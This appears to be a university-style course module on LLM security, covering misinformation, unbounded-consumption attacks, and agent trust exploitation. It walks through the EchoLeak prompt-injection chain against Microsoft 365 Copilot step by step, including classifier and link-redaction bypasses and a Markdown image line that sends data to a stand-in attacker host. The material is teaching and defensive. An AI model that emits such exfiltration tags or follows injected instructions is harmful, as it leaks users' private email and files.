Classroom Glossary Public page

Module 9: Misinformation + Unbounded Consumption + EchoLeak -- LLM09 + LLM10:2025

1,622 words

Duration: 2 hr lecture + 4 hr lab + 5 hr independent Lab: Lab 9 (Token-Spam DoS Observation + EchoLeak Case Study) OWASP anchor: LLM09:2025 Misinformation / LLM10:2025 Unbounded Consumption / ASI07:2026 Goal Drift / ASI09:2026 Human-Agent Trust Exploitation / ASI10:2026 Rogue Agents Case study: EchoLeak (CVE-2025-32711, arXiv 2509.10540) -- assigned reading before lecture


9.1 LLM09:2025 -- Misinformation

Misinformation is the only OWASP LLM entry that does not require an attacker. The model generates false information on its own. This makes it different from all other Top 10 entries, which require some form of adversarial input.

Hallucination mechanics. LLMs generate the next token based on probability over the training distribution. When asked about facts outside their training distribution (recent events, obscure topics, domain-specific details), the model does not "know it doesn't know" -- it continues generating plausible-sounding tokens. The result is confident-sounding but factually incorrect output.

Why this is a security issue:

  • A security practitioner relying on an LLM to identify CVEs may get plausible-sounding but incorrect CVE descriptions
  • An LLM-generated code review may claim code is secure when it is not
  • An AI-generated legal document may contain false citations or incorrect regulatory requirements
  • In medical, financial, or safety-critical applications, LLM misinformation can cause direct harm

Confabulation vs. hallucination: In the literature these terms overlap, but a useful distinction: hallucination is generating false factual claims; confabulation is generating plausible narratives that fill in gaps in knowledge with invented but coherent-sounding content. Both are the same underlying mechanism (next-token prediction), but confabulation is harder to detect because it is internally consistent.


9.2 Misinformation in Security Contexts

CVE confabulation. LLMs trained on NVD data and security research will sometimes generate "CVEs" that don't exist, or describe real CVEs with incorrect details (wrong CVSS score, wrong affected version, invented PoC). For security practitioners, this is a reliability problem: you cannot cite an LLM CVE description without independent verification.

Code security false-positives and false-negatives. Code review LLMs both miss real vulnerabilities (false negatives) and flag non-existent vulnerabilities (false positives). The false confidence problem: an LLM that says "this code is secure" provides false assurance. Practitioners should use LLMs as a first-pass screen, not a final verdict.

Adversarial misinformation. An attacker can deliberately prompt an LLM to generate false security advisories, fake CVEs, or misleading threat intelligence. If the output is published without verification, it pollutes the information environment.

ASI07:2026 Goal Drift. In agentic systems, the model accumulates context over a long task. As the context grows, the model's actual goals can drift from the initial task due to accumulated context interactions. The agent may start "optimizing" toward a subtly different objective than what was specified. This is an AI-safety concern at the foundational level; in AI-101 we treat it as a prompt hygiene issue (shorter, more focused contexts drift less).


9.3 Defenses Against Misinformation

Grounding via RAG. Retrieval-augmented generation anchors model responses to specific retrieved documents. When the model is forced to cite its sources, hallucination rates drop because the model's output is constrained by the retrieved text. RAG does not eliminate hallucination but significantly reduces it for factual claims.

Citation requirements. Prompt engineering that requires the model to cite a source for every factual claim. Claims without retrievable sources can be flagged as unverified.

Output temperature reduction. Lower sampling temperature (closer to greedy/deterministic decoding) reduces hallucination frequency because the model is more likely to follow its training distribution rather than explore low-probability continuations. Tradeoff: lower temperature also reduces creativity and can increase repetition.

Verification pipeline. For high-stakes applications, treat LLM output as a draft and verify facts against authoritative sources before publishing or acting. This moves the human back into the loop for the verification step.

Domain-specific fine-tuning. A model fine-tuned on high-quality domain-specific data (e.g., NVD + security research papers) will hallucinate less on that domain. But fine-tuning is expensive and introduces LLM04 (poisoning) risk if the fine-tune data is not carefully curated.


9.4 LLM10:2025 -- Unbounded Consumption

LLM10 covers attacks that cause excessive resource consumption -- denial of service, cost inflation, or system degradation via input manipulation.

Token-spam DoS. An attacker sends a large number of API requests with long input prompts. Cost amplification: if the attacker uses the free/public tier of a service, they can force the operator to incur API costs far exceeding the attacker's own costs.

Sponge attacks. Crafted inputs that maximize the model's context window usage and force maximum-length output. A minimal input prompt that causes the model to generate 4,096 tokens of output costs 80x what a prompt that generates 50 tokens costs.

Recursion and self-reference. Inputs that cause the model to loop (in an agentic context) or to generate increasingly long outputs as part of a chain. Example: "Write a story about a story about a story about..." can cause runaway generation in some models or frameworks.

Resource exhaustion via complexity. Chain-of-thought prompting and complex reasoning increase computational cost per token. An input carefully crafted to maximize the model's reasoning steps (e.g., adversarial math problems) costs more to process than a simple query.


9.5 Defenses Against Unbounded Consumption

Rate limiting. Standard API rate limiting by IP, user, or API key. Bursts above a per-session token budget trigger delays or rejections.

Token budget enforcement. Hard limit on max_tokens in every API call. Never allow the application to pass unbounded max_tokens.

Input length limits. Reject inputs above a character/token threshold. Simple and effective against naive attacks.

Async timeout. Set a wall-clock timeout on all API calls. If the model has not finished generating in N seconds, cancel the request.

Cost monitoring. Set spend alerts at the provider level. AWS, OpenAI, and Anthropic all provide per-day or per-hour spend alerts. If spend exceeds a threshold, page on-call.


9.6 EchoLeak: Case Study in Production AI Exploitation

EchoLeak (CVE-2025-32711) is the first documented real-world case of prompt injection being weaponized for concrete data exfiltration in a production AI system. CVSS 9.3 (Critical). Disclosed June 2025, patched by Microsoft server-side.

The target: Microsoft 365 Copilot -- an AI assistant with access to the user's email, OneDrive files, SharePoint content, Teams messages, and calendar.

The attack chain:

Step 1: Payload delivery. Attacker sends the victim a crafted email or shares a document containing hidden instructions. The instructions are embedded as white text on a white background or in a comment field, invisible to the human reader.

Step 2: XPIA classifier bypass. Microsoft deployed an "XPIA" (Cross Prompt Injection Attempt) classifier that analyzed Copilot's context for injection patterns. The attackers crafted their instructions to avoid the classifier's detection patterns.

Step 3: Link redaction bypass. Copilot's output filtering redacted suspicious links. The attackers used reference-style Markdown ([text][1] with the URL defined elsewhere) to evade the link-redaction filter.

Step 4: Image exfiltration channel. The payload instructed Copilot to include in its response a Markdown image tag pointing to the attacker's server: ![x](https://attacker.example.com/exfil?data=EXFILTRATED_CONTENT). When Copilot returned this response, the victim's browser fetched the image URL, sending the encoded data to the attacker.

Step 5: CSP bypass via Teams proxy. Microsoft Teams allowed images to be loaded via a Microsoft-controlled proxy (to avoid mixed-content warnings). This proxy was in the Copilot CSP allow-list. The attacker's image URL, when fetched via the Teams proxy, still delivered the data to the attacker's server.

Why this is significant:

  • Zero-click: victim does not need to do anything other than receive an email and open Copilot
  • Data exfiltrated: anything within Copilot's access scope -- all emails, all OneDrive files, all Teams messages
  • Defense chains bypassed: four separate defenses (XPIA classifier, link redaction, CSP, SSRF protection) were bypassed via chained exploit

Structural lessons:

  1. Defense layers deployed independently can be bypassed by chaining
  2. IDOR + prompt injection is a dangerous combination: the model can access data across trust boundaries (other users' data, system data) and can be prompted to exfiltrate it
  3. The CSP that was meant to protect against external exfiltration was itself a bypass mechanism (the Teams proxy whitelist)

9.7 ASI09:2026 -- Human-Agent Trust Exploitation

ASI09 describes how attackers exploit the trust that humans place in AI agents. As AI agents gain authority and autonomy in workflows, humans begin to trust their outputs without scrutiny.

Anthropomorphism bias. Users anthropomorphize AI agents -- they attribute intent, trustworthiness, and authority to the agent based on its fluent language production. An agent that communicates confidently in natural language appears trustworthy even when it is acting against the user's interests.

Authority exploitation. An agent that has been used reliably for months is trusted without scrutiny. An attacker who can inject into that agent's context can leverage the accumulated trust to cause the user to approve harmful actions.

Automation bias. Users systematically over-trust automated systems. If a Copilot agent says "I have summarized your security findings," the user is less likely to read them carefully than if a human analyst said the same thing.

Defense: maintain human oversight for all consequential decisions. "Human-in-the-loop" is not just a safety principle -- it is the structural defense against ASI09.


9.8 Module 9 Summary

Concept Key takeaway
LLM09 misinformation Hallucination is the model's default for out-of-distribution facts; not an attacker requirement
Security-specific misinformation CVE confabulation; code security false assurance; adversarial fake advisories
RAG as mitigation Grounding to sources reduces (not eliminates) hallucination
LLM10 unbounded consumption Token-spam DoS; sponge attacks; rate limiting + max_tokens as defense
EchoLeak Zero-click prompt injection + IDOR + exfiltration; chained bypass of 4 defenses
ASI09 Human trust in AI agents is an attack surface; maintain human oversight

Reading for Module 10

  • Christian, The Alignment Problem, Ch 1 "Prophecy" (Module 10 forward-pointer; deep dive in AI-301)
  • Review the open-source LangChain agent you will threat-model (CAPSTONE.md specifies the target)
  • D8 methodology review: AI-101-OUTLINE.md Section "Learning Outcomes" #8